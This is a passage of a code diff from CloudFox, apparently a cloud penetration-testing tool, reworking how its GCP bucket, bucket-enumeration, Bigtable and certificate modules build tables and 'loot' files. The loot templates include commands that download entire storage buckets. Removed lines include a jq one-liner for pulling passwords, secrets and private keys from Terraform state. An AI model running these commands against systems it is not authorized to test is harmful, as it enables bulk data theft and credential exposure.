instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + if len(instanceBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigtable-instances", + Header: instanceHeader, + Body: instanceBody, + }) + } + + // Tables table (one row per IAM binding member) + tableHeader := []string{"Project Name", "Project ID", "Instance", "Table", "Role", "Member", "Public"} + + var tableBody [][]string + for _, table := range m.Tables { + publicAccess := "No" + if table.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the table + if len(table.IAMBindings) == 0 { + tableBody = append(tableBody, []string{ + m.GetProjectName(table.ProjectID), + table.ProjectID, + table.InstanceName, + table.Name, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + tableBody = append(tableBody, []string{ + m.GetProjectName(table.ProjectID), + table.ProjectID, + table.InstanceName, + table.Name, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + if len(tableBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigtable-tables", + Header: tableHeader, + Body: tableBody, }) } @@ -127,7 +273,7 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger } output := BigtableOutput{ - Table: []internal.TableFile{{Name: "bigtable", Header: header, Body: body}}, + Table: tables, Loot: lootFiles, } diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index f3d81d9d..459383e2 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -144,189 +144,109 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, } func (m *BucketEnumModule) initializeLootFiles() { - m.LootMap["bucket-sensitive-files"] = &internal.LootFile{ - Name: "bucket-sensitive-files", - Contents: "# GCS Sensitive Files\n# Generated by CloudFox\n\n", + m.LootMap["bucket-enum-sensitive-commands"] = &internal.LootFile{ + Name: "bucket-enum-sensitive-commands", + Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } - m.LootMap["bucket-download-commands"] = &internal.LootFile{ - Name: "bucket-download-commands", - Contents: "# GCS Download Commands for Sensitive Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["bucket-credentials"] = &internal.LootFile{ - Name: "bucket-credentials", - Contents: "# Potential Credential Files in GCS\n# Generated by CloudFox\n# CRITICAL: These may contain service account keys or secrets\n\n", - } - m.LootMap["bucket-configs"] = &internal.LootFile{ - Name: "bucket-configs", - Contents: "# Configuration Files in GCS\n# Generated by CloudFox\n# May contain hardcoded secrets\n\n", - } - m.LootMap["bucket-terraform"] = &internal.LootFile{ - Name: "bucket-terraform", - Contents: "# Terraform State Files in GCS\n# Generated by CloudFox\n# CRITICAL: Terraform state contains all secrets in plaintext!\n\n", + m.LootMap["bucket-enum-commands"] = &internal.LootFile{ + Name: "bucket-enum-commands", + Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *BucketEnumModule) addFileToLoot(file bucketenumservice.SensitiveFileInfo) { - // All sensitive files - m.LootMap["bucket-sensitive-files"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Bucket: %s\n"+ - "## Object: %s\n"+ - "## Category: %s\n"+ - "## Description: %s\n"+ - "## Size: %d bytes\n"+ - "## Updated: %s\n\n", + // All files go to the general commands file + m.LootMap["bucket-enum-commands"].Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "%s\n\n", file.RiskLevel, file.Category, - file.BucketName, - file.ObjectName, - file.Category, - file.Description, - file.Size, - file.Updated, - ) - - // Download commands - m.LootMap["bucket-download-commands"].Contents += fmt.Sprintf( - "# [%s] %s - %s\n%s\n\n", - file.RiskLevel, file.Category, file.ObjectName, + file.BucketName, file.ObjectName, + file.Description, file.Size, file.DownloadCmd, ) - // Credentials specifically - if file.Category == "Credential" || file.RiskLevel == "CRITICAL" { - m.LootMap["bucket-credentials"].Contents += fmt.Sprintf( - "## [CRITICAL] %s\n"+ - "## Bucket: gs://%s/%s\n"+ - "## Description: %s\n"+ - "## Download: %s\n\n", - file.ObjectName, + // CRITICAL and HIGH risk files also go to the sensitive commands file + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + m.LootMap["bucket-enum-sensitive-commands"].Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "%s\n\n", + file.RiskLevel, file.Category, file.BucketName, file.ObjectName, - file.Description, - file.DownloadCmd, - ) - } - - // Config files - if file.Category == "Config" { - m.LootMap["bucket-configs"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Bucket: gs://%s/%s\n"+ - "## Description: %s\n"+ - "## Download: %s\n\n", - file.RiskLevel, file.ObjectName, - file.BucketName, file.ObjectName, - file.Description, + file.Description, file.Size, file.DownloadCmd, ) } - - // Terraform state files specifically - if strings.Contains(strings.ToLower(file.ObjectName), "tfstate") || - strings.Contains(strings.ToLower(file.ObjectName), "terraform") { - m.LootMap["bucket-terraform"].Contents += fmt.Sprintf( - "## [CRITICAL] Terraform State Found!\n"+ - "## Bucket: gs://%s/%s\n"+ - "## Size: %d bytes\n"+ - "## Download: %s\n"+ - "## \n"+ - "## After download, extract secrets with:\n"+ - "## cat %s | jq -r '.resources[].instances[].attributes | select(.password != null or .secret != null or .private_key != null)'\n"+ - "## \n\n", - file.BucketName, file.ObjectName, - file.Size, - file.DownloadCmd, - strings.ReplaceAll(file.ObjectName, "/", "_"), - ) - } } func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main sensitive files table + // All files table header := []string{ - "Risk", - "Category", + "Project ID", + "Project Name", "Bucket", "Object Name", + "Category", "Size", + "Public", "Description", - "Project Name", - "Project", } var body [][]string for _, file := range m.SensitiveFiles { - // Truncate long object names - objName := file.ObjectName - if len(objName) > 50 { - objName = "..." + objName[len(objName)-47:] + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" } body = append(body, []string{ - file.RiskLevel, - file.Category, + file.ProjectID, + m.GetProjectName(file.ProjectID), file.BucketName, - objName, + file.ObjectName, + file.Category, formatFileSize(file.Size), + publicStatus, file.Description, - m.GetProjectName(file.ProjectID), - file.ProjectID, }) } - // Critical files table - critHeader := []string{ + // Critical/High risk files table (sensitive files) + sensitiveHeader := []string{ + "Project ID", + "Project Name", "Bucket", "Object Name", "Category", - "Description", - "Download Command", + "Size", + "Public", } - var critBody [][]string + var sensitiveBody [][]string for _, file := range m.SensitiveFiles { - if file.RiskLevel == "CRITICAL" { - critBody = append(critBody, []string{ + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + + sensitiveBody = append(sensitiveBody, []string{ + file.ProjectID, + m.GetProjectName(file.ProjectID), file.BucketName, file.ObjectName, file.Category, - file.Description, - file.DownloadCmd, + formatFileSize(file.Size), + publicStatus, }) } } - // By bucket summary - bucketCounts := make(map[string]int) - for _, file := range m.SensitiveFiles { - bucketCounts[file.BucketName]++ - } - - bucketHeader := []string{ - "Bucket", - "Sensitive Files", - "Project Name", - "Project", - } - - var bucketBody [][]string - bucketProjects := make(map[string]string) - for _, file := range m.SensitiveFiles { - bucketProjects[file.BucketName] = file.ProjectID - } - for bucket, count := range bucketCounts { - projectID := bucketProjects[bucket] - bucketBody = append(bucketBody, []string{ - bucket, - fmt.Sprintf("%d", count), - m.GetProjectName(projectID), - projectID, - }) - } - // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -339,21 +259,13 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg }, } - if len(critBody) > 0 { + if len(sensitiveBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "bucket-enum-critical", - Header: critHeader, - Body: critBody, - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL files (potential credentials)!", len(critBody)), globals.GCP_BUCKETENUM_MODULE_NAME) - } - - if len(bucketBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "bucket-enum-summary", - Header: bucketHeader, - Body: bucketBody, + Name: "bucket-enum-sensitive", + Header: sensitiveHeader, + Body: sensitiveBody, }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) } output := BucketEnumOutput{Table: tables, Loot: lootFiles} @@ -370,8 +282,8 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg m.Verbosity, m.WrapTable, "project", - scopeNames, m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index 392224e9..46dbd055 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -154,247 +154,41 @@ func (m *BucketsModule) processProject(ctx context.Context, projectID string, lo // Loot File Management // ------------------------------ func (m *BucketsModule) initializeLootFiles() { - m.LootMap["buckets-gcloud-commands"] = &internal.LootFile{ - Name: "buckets-gcloud-commands", - Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["buckets-gsutil-commands"] = &internal.LootFile{ - Name: "buckets-gsutil-commands", - Contents: "# GCP gsutil Commands for Data Access\n# Generated by CloudFox\n\n", - } - m.LootMap["buckets-exploitation"] = &internal.LootFile{ - Name: "buckets-exploitation", - Contents: "# GCP Bucket Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["buckets-public"] = &internal.LootFile{ - Name: "buckets-public", - Contents: "# PUBLIC GCP Buckets\n# Generated by CloudFox\n# These buckets have allUsers or allAuthenticatedUsers access!\n\n", - } - m.LootMap["buckets-iam-bindings"] = &internal.LootFile{ - Name: "buckets-iam-bindings", - Contents: "# GCP Bucket IAM Bindings\n# Generated by CloudFox\n\n", - } - // New enhancement loot files - m.LootMap["buckets-no-versioning"] = &internal.LootFile{ - Name: "buckets-no-versioning", - Contents: "# GCP Buckets WITHOUT Object Versioning\n# These buckets have no protection against accidental deletion or overwrites\n# Generated by CloudFox\n\n", - } - m.LootMap["buckets-no-lifecycle"] = &internal.LootFile{ - Name: "buckets-no-lifecycle", - Contents: "# GCP Buckets WITHOUT Lifecycle Policies\n# These buckets may accumulate unnecessary data and costs\n# Generated by CloudFox\n\n", - } - m.LootMap["buckets-short-retention"] = &internal.LootFile{ - Name: "buckets-short-retention", - Contents: "# GCP Buckets with Short Delete Lifecycle (< 30 days)\n# Data may be deleted quickly - verify this is intentional\n# Generated by CloudFox\n\n", - } - m.LootMap["buckets-locked-retention"] = &internal.LootFile{ - Name: "buckets-locked-retention", - Contents: "# GCP Buckets with LOCKED Retention Policies\n# These buckets have immutable retention - data cannot be deleted before policy expires\n# Generated by CloudFox\n\n", - } - m.LootMap["buckets-dual-region"] = &internal.LootFile{ - Name: "buckets-dual-region", - Contents: "# GCP Buckets with Dual/Multi-Region Configuration\n# These buckets have built-in geo-redundancy\n# Generated by CloudFox\n\n", - } - m.LootMap["buckets-security-recommendations"] = &internal.LootFile{ - Name: "buckets-security-recommendations", - Contents: "# GCP Bucket Security Recommendations\n# Generated by CloudFox\n\n", + m.LootMap["buckets-commands"] = &internal.LootFile{ + Name: "buckets-commands", + Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *BucketsModule) addBucketToLoot(bucket CloudStorageService.BucketInfo) { - // gcloud commands for enumeration - m.LootMap["buckets-gcloud-commands"].Contents += fmt.Sprintf( - "# Bucket: %s (Project: %s, Location: %s)\n"+ + // All commands for this bucket + m.LootMap["buckets-commands"].Contents += fmt.Sprintf( + "## Bucket: gs://%s (Project: %s, Location: %s)\n"+ + "# Describe bucket:\n"+ "gcloud storage buckets describe gs://%s --project=%s\n"+ - "gcloud storage buckets get-iam-policy gs://%s --project=%s\n\n", - bucket.Name, bucket.ProjectID, bucket.Location, - bucket.Name, bucket.ProjectID, - bucket.Name, bucket.ProjectID, - ) - - // gsutil commands for data access - m.LootMap["buckets-gsutil-commands"].Contents += fmt.Sprintf( - "# Bucket: %s\n"+ + "# Get IAM policy:\n"+ + "gcloud storage buckets get-iam-policy gs://%s --project=%s\n"+ + "# List objects:\n"+ "gsutil ls gs://%s/\n"+ "gsutil ls -L gs://%s/\n"+ - "gsutil du -s gs://%s/\n\n", - bucket.Name, - bucket.Name, - bucket.Name, - bucket.Name, - ) - - // Exploitation commands - m.LootMap["buckets-exploitation"].Contents += fmt.Sprintf( - "# Bucket: %s\n"+ "# List all objects recursively:\n"+ "gsutil ls -r gs://%s/**\n"+ + "# Get bucket size:\n"+ + "gsutil du -s gs://%s/\n"+ "# Download all contents:\n"+ "gsutil -m cp -r gs://%s/ ./loot/%s/\n"+ "# Check for public access:\n"+ "curl -s https://storage.googleapis.com/%s/ | head -20\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, bucket.ProjectID, + bucket.Name, bucket.ProjectID, + bucket.Name, + bucket.Name, bucket.Name, bucket.Name, bucket.Name, bucket.Name, bucket.Name, ) - - // Public buckets - if bucket.IsPublic { - m.LootMap["buckets-public"].Contents += fmt.Sprintf( - "# BUCKET: %s\n"+ - "# Project: %s\n"+ - "# Public Access: %s\n"+ - "# Public Access Prevention: %s\n"+ - "# Direct URL: https://storage.googleapis.com/%s/\n"+ - "# Console URL: https://console.cloud.google.com/storage/browser/%s\n"+ - "curl -s https://storage.googleapis.com/%s/ | head -50\n"+ - "gsutil ls gs://%s/\n\n", - bucket.Name, - bucket.ProjectID, - bucket.PublicAccess, - bucket.PublicAccessPrevention, - bucket.Name, - bucket.Name, - bucket.Name, - bucket.Name, - ) - } - - // IAM bindings - if len(bucket.IAMBindings) > 0 { - m.LootMap["buckets-iam-bindings"].Contents += fmt.Sprintf( - "# Bucket: %s (Project: %s)\n", - bucket.Name, bucket.ProjectID, - ) - for _, binding := range bucket.IAMBindings { - m.LootMap["buckets-iam-bindings"].Contents += fmt.Sprintf( - "# Role: %s\n# Members: %s\n", - binding.Role, - strings.Join(binding.Members, ", "), - ) - } - m.LootMap["buckets-iam-bindings"].Contents += "\n" - } - - // Enhancement: No versioning - if !bucket.VersioningEnabled { - m.LootMap["buckets-no-versioning"].Contents += fmt.Sprintf( - "gs://%s # Project: %s, Location: %s\n"+ - "# Enable versioning: gcloud storage buckets update gs://%s --versioning\n\n", - bucket.Name, bucket.ProjectID, bucket.Location, - bucket.Name, - ) - } - - // Enhancement: No lifecycle - if !bucket.LifecycleEnabled { - m.LootMap["buckets-no-lifecycle"].Contents += fmt.Sprintf( - "gs://%s # Project: %s, Location: %s\n"+ - "# Add lifecycle: gcloud storage buckets update gs://%s --lifecycle-file=lifecycle.json\n\n", - bucket.Name, bucket.ProjectID, bucket.Location, - bucket.Name, - ) - } - - // Enhancement: Short retention (delete lifecycle < 30 days) - if bucket.HasDeleteRule && bucket.ShortestDeleteDays > 0 && bucket.ShortestDeleteDays < 30 { - m.LootMap["buckets-short-retention"].Contents += fmt.Sprintf( - "gs://%s # Project: %s, Delete after: %d days\n", - bucket.Name, bucket.ProjectID, bucket.ShortestDeleteDays, - ) - } - - // Enhancement: Locked retention - if bucket.RetentionPolicyLocked { - m.LootMap["buckets-locked-retention"].Contents += fmt.Sprintf( - "gs://%s # Project: %s, Retention: %d days (LOCKED - IMMUTABLE)\n", - bucket.Name, bucket.ProjectID, bucket.RetentionPeriodDays, - ) - } - - // Enhancement: Dual/Multi-region - if bucket.LocationType == "dual-region" || bucket.LocationType == "multi-region" { - turboStatus := "" - if bucket.TurboReplication { - turboStatus = " (Turbo Replication ENABLED)" - } - m.LootMap["buckets-dual-region"].Contents += fmt.Sprintf( - "gs://%s # Project: %s, Type: %s, Location: %s%s\n", - bucket.Name, bucket.ProjectID, bucket.LocationType, bucket.Location, turboStatus, - ) - } - - // Add security recommendations - m.addBucketSecurityRecommendations(bucket) -} - -// addBucketSecurityRecommendations generates security recommendations for a bucket -func (m *BucketsModule) addBucketSecurityRecommendations(bucket CloudStorageService.BucketInfo) { - hasRecommendations := false - recommendations := fmt.Sprintf("# BUCKET: gs://%s (Project: %s)\n", bucket.Name, bucket.ProjectID) - - // Public access - if bucket.IsPublic { - hasRecommendations = true - recommendations += fmt.Sprintf("# [CRITICAL] Public access detected: %s\n", bucket.PublicAccess) - recommendations += fmt.Sprintf("# Remediation: Review and remove public access\n") - recommendations += fmt.Sprintf("gcloud storage buckets remove-iam-policy-binding gs://%s --member=allUsers --role=\n", bucket.Name) - recommendations += fmt.Sprintf("gcloud storage buckets remove-iam-policy-binding gs://%s --member=allAuthenticatedUsers --role=\n", bucket.Name) - } - - // No versioning - if !bucket.VersioningEnabled { - hasRecommendations = true - recommendations += "# [MEDIUM] Object versioning is disabled - no protection against accidental deletion\n" - recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --versioning\n", bucket.Name) - } - - // No lifecycle policy - if !bucket.LifecycleEnabled { - hasRecommendations = true - recommendations += "# [LOW] No lifecycle policy - may accumulate unnecessary data and costs\n" - recommendations += fmt.Sprintf("# Add lifecycle: gcloud storage buckets update gs://%s --lifecycle-file=lifecycle.json\n", bucket.Name) - } - - // Not uniform access (using ACLs) - if !bucket.UniformBucketLevelAccess { - hasRecommendations = true - recommendations += "# [MEDIUM] Not using uniform bucket-level access - ACLs are harder to audit\n" - recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --uniform-bucket-level-access\n", bucket.Name) - } - - // No logging - if !bucket.LoggingEnabled { - hasRecommendations = true - recommendations += "# [LOW] Access logging is disabled - no audit trail for bucket access\n" - recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --log-bucket= --log-object-prefix=%s\n", bucket.Name, bucket.Name) - } - - // Google-managed encryption (not CMEK) - if bucket.EncryptionType == "Google-managed" { - hasRecommendations = true - recommendations += "# [INFO] Using Google-managed encryption - consider CMEK for compliance requirements\n" - recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --default-encryption-key=projects//locations//keyRings//cryptoKeys/\n", bucket.Name) - } - - // Public access prevention not enforced - if bucket.PublicAccessPrevention != "enforced" { - hasRecommendations = true - recommendations += "# [MEDIUM] Public access prevention not enforced - bucket could be made public\n" - recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --public-access-prevention\n", bucket.Name) - } - - // No soft delete - if !bucket.SoftDeleteEnabled { - hasRecommendations = true - recommendations += "# [LOW] Soft delete not enabled - deleted objects cannot be recovered\n" - recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --soft-delete-duration=7d\n", bucket.Name) - } - - if hasRecommendations { - m.LootMap["buckets-security-recommendations"].Contents += recommendations + "\n" - } } // ------------------------------ @@ -407,15 +201,7 @@ func boolToYesNo(b bool) string { return "No" } -func boolToCheckMark(b bool) string { - if b { - return "✓" - } - return "-" -} - // getMemberType extracts the member type from a GCP IAM member string -// Member formats: user:email, serviceAccount:email, group:email, domain:domain, allUsers, allAuthenticatedUsers func getMemberType(member string) string { switch { case member == "allUsers": @@ -447,157 +233,65 @@ func getMemberType(member string) string { // Output Generation // ------------------------------ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main table with security-relevant columns + // Combined table with IAM columns (one row per IAM member) header := []string{ - "Project Name", "Project ID", + "Project Name", "Name", "Location", - "Type", "Public", "Versioning", - "Lifecycle", - "Retention", + "Uniform Access", "Encryption", - } - - var body [][]string - for _, bucket := range m.Buckets { - // Format retention info - retentionInfo := "-" - if bucket.RetentionPolicyEnabled { - if bucket.RetentionPolicyLocked { - retentionInfo = fmt.Sprintf("%dd (LOCKED)", bucket.RetentionPeriodDays) - } else { - retentionInfo = fmt.Sprintf("%dd", bucket.RetentionPeriodDays) - } - } - - // Format public access - highlight if public - publicDisplay := "-" - if bucket.IsPublic { - publicDisplay = "PUBLIC" - } - - // Format lifecycle info - lifecycleInfo := "-" - if bucket.LifecycleEnabled { - if bucket.HasDeleteRule { - lifecycleInfo = fmt.Sprintf("%d rules (del:%dd)", bucket.LifecycleRuleCount, bucket.ShortestDeleteDays) - } else { - lifecycleInfo = fmt.Sprintf("%d rules", bucket.LifecycleRuleCount) - } - } - - // Format location type - locationType := bucket.LocationType - if locationType == "" { - locationType = "region" - } - if bucket.TurboReplication { - locationType += "+turbo" - } - - body = append(body, []string{ - m.GetProjectName(bucket.ProjectID), - bucket.ProjectID, - bucket.Name, - bucket.Location, - locationType, - publicDisplay, - boolToCheckMark(bucket.VersioningEnabled), - lifecycleInfo, - retentionInfo, - bucket.EncryptionType, - }) - } - - // Security config table - securityHeader := []string{ - "Bucket", - "Project Name", - "Project ID", - "PublicAccessPrevention", - "UniformAccess", - "Logging", - "SoftDelete", - "Autoclass", - } - - var securityBody [][]string - for _, bucket := range m.Buckets { - softDeleteInfo := "-" - if bucket.SoftDeleteEnabled { - softDeleteInfo = fmt.Sprintf("%dd", bucket.SoftDeleteRetentionDays) - } - - autoclassInfo := "-" - if bucket.AutoclassEnabled { - autoclassInfo = bucket.AutoclassTerminalClass - if autoclassInfo == "" { - autoclassInfo = "enabled" - } - } - - securityBody = append(securityBody, []string{ - bucket.Name, - m.GetProjectName(bucket.ProjectID), - bucket.ProjectID, - bucket.PublicAccessPrevention, - boolToCheckMark(bucket.UniformBucketLevelAccess), - boolToCheckMark(bucket.LoggingEnabled), - softDeleteInfo, - autoclassInfo, - }) - } - - // Detailed IAM table - one row per member for granular view - iamHeader := []string{ - "Bucket", - "Project Name", - "Project ID", "Role", "Member Type", "Member", } - var iamBody [][]string + var body [][]string + publicCount := 0 for _, bucket := range m.Buckets { - for _, binding := range bucket.IAMBindings { - for _, member := range binding.Members { - memberType := getMemberType(member) - iamBody = append(iamBody, []string{ - bucket.Name, - m.GetProjectName(bucket.ProjectID), - bucket.ProjectID, - binding.Role, - memberType, - member, - }) - } + // Format public access + publicDisplay := "" + if bucket.IsPublic { + publicDisplay = bucket.PublicAccess + publicCount++ } - } - - // Public buckets table (if any) - publicHeader := []string{ - "Bucket", - "Project Name", - "Project ID", - "Public Access", - "Public Access Prevention", - "URL", - } - var publicBody [][]string - for _, bucket := range m.Buckets { - if bucket.IsPublic { - publicBody = append(publicBody, []string{ - bucket.Name, - m.GetProjectName(bucket.ProjectID), + // One row per IAM member + if len(bucket.IAMBindings) > 0 { + for _, binding := range bucket.IAMBindings { + for _, member := range binding.Members { + memberType := getMemberType(member) + body = append(body, []string{ + bucket.ProjectID, + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + boolToYesNo(bucket.VersioningEnabled), + boolToYesNo(bucket.UniformBucketLevelAccess), + bucket.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Bucket with no IAM bindings + body = append(body, []string{ bucket.ProjectID, - bucket.PublicAccess, - bucket.PublicAccessPrevention, - fmt.Sprintf("https://storage.googleapis.com/%s/", bucket.Name), + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + boolToYesNo(bucket.VersioningEnabled), + boolToYesNo(bucket.UniformBucketLevelAccess), + bucket.EncryptionType, + "-", + "-", + "-", }) } } @@ -605,7 +299,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -617,29 +311,10 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) Header: header, Body: body, }, - { - Name: "buckets-security-config", - Header: securityHeader, - Body: securityBody, - }, } - // Add IAM table if there are bindings - if len(iamBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "buckets-iam", - Header: iamHeader, - Body: iamBody, - }) - } - - // Add public buckets table if any - if len(publicBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "buckets-public", - Header: publicHeader, - Body: publicBody, - }) + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_BUCKETS_MODULE_NAME) } output := BucketsOutput{ @@ -660,9 +335,9 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames (display names) + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames (display names) m.Account, output, ) diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go index 6007a29b..51e25291 100644 --- a/gcp/commands/certmanager.go +++ b/gcp/commands/certmanager.go @@ -182,133 +182,76 @@ func (m *CertManagerModule) processProject(ctx context.Context, projectID string // Loot File Management // ------------------------------ func (m *CertManagerModule) initializeLootFiles() { - m.LootMap["all-certificates"] = &internal.LootFile{ - Name: "all-certificates", - Contents: "# SSL/TLS Certificates\n# Generated by CloudFox\n\n", + m.LootMap["certmanager-details"] = &internal.LootFile{ + Name: "certmanager-details", + Contents: "# Certificate Manager Details\n# Generated by CloudFox\n\n", } - m.LootMap["expiring-certificates"] = &internal.LootFile{ - Name: "expiring-certificates", - Contents: "# Expiring/Expired Certificates\n# Generated by CloudFox\n# These certificates need immediate attention!\n\n", +} + +func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { + // Build flags for special attributes + var flags []string + if cert.Wildcard { + flags = append(flags, "WILDCARD") } - m.LootMap["certificate-domains"] = &internal.LootFile{ - Name: "certificate-domains", - Contents: "# Domains from Certificates\n# Generated by CloudFox\n# Useful for subdomain enumeration\n\n", + if cert.Expired { + flags = append(flags, "EXPIRED") + } else if cert.DaysUntilExpiry <= 30 { + flags = append(flags, "EXPIRING") } - m.LootMap["wildcard-certificates"] = &internal.LootFile{ - Name: "wildcard-certificates", - Contents: "# Wildcard Certificates\n# Generated by CloudFox\n# High impact if private key is exposed\n\n", + if cert.SelfManaged { + flags = append(flags, "SELF-MANAGED") } -} -func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { - // All certificates - m.LootMap["all-certificates"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s | Location: %s\n"+ - "## Type: %s | State: %s\n"+ - "## Domains: %s\n"+ - "## Expires: %s (%d days)\n", - cert.RiskLevel, cert.Name, + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + "# %s%s\n"+ + "Project: %s | Location: %s\n"+ + "Type: %s | State: %s\n"+ + "Domains: %s\n"+ + "Expires: %s (%d days)\n\n", + cert.Name, flagStr, cert.ProjectID, cert.Location, cert.Type, cert.State, strings.Join(cert.Domains, ", "), cert.ExpireTime, cert.DaysUntilExpiry, ) - for _, reason := range cert.RiskReasons { - m.LootMap["all-certificates"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["all-certificates"].Contents += "\n" +} - // Expiring certificates - if cert.DaysUntilExpiry <= 30 { - status := "EXPIRING" - if cert.DaysUntilExpiry < 0 { - status = "EXPIRED" - } - m.LootMap["expiring-certificates"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s\n"+ - "## Domains: %s\n"+ - "## Expires: %s (%d days)\n\n", - status, cert.Name, - cert.ProjectID, - strings.Join(cert.Domains, ", "), - cert.ExpireTime, cert.DaysUntilExpiry, - ) +func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertificate) { + // Build flags for special attributes + var flags []string + if cert.Wildcard { + flags = append(flags, "WILDCARD") } - - // Domains - for _, domain := range cert.Domains { - m.LootMap["certificate-domains"].Contents += domain + "\n" + if cert.Expired { + flags = append(flags, "EXPIRED") + } else if cert.DaysUntilExpiry <= 30 { + flags = append(flags, "EXPIRING") + } + if cert.SelfManaged { + flags = append(flags, "SELF-MANAGED") } - // Wildcard certificates - for _, domain := range cert.Domains { - if strings.HasPrefix(domain, "*") { - m.LootMap["wildcard-certificates"].Contents += fmt.Sprintf( - "## %s (Project: %s)\n"+ - "## Wildcard Domain: %s\n"+ - "## If the private key is compromised, an attacker can MITM any subdomain\n"+ - "## Check for: key material in repos, backups, logs, or developer machines\n\n", - cert.Name, cert.ProjectID, domain, - ) - break - } + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" } -} -func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertificate) { - // All certificates - m.LootMap["all-certificates"].Contents += fmt.Sprintf( - "## [%s] %s (SSL Certificate)\n"+ - "## Project: %s | Type: %s\n"+ - "## Domains: %s\n"+ - "## Expires: %s (%d days)\n", - cert.RiskLevel, cert.Name, + m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + "# %s (SSL Certificate)%s\n"+ + "Project: %s | Type: %s\n"+ + "Domains: %s\n"+ + "Expires: %s (%d days)\n\n", + cert.Name, flagStr, cert.ProjectID, cert.Type, strings.Join(cert.Domains, ", "), cert.ExpireTime, cert.DaysUntilExpiry, ) - for _, reason := range cert.RiskReasons { - 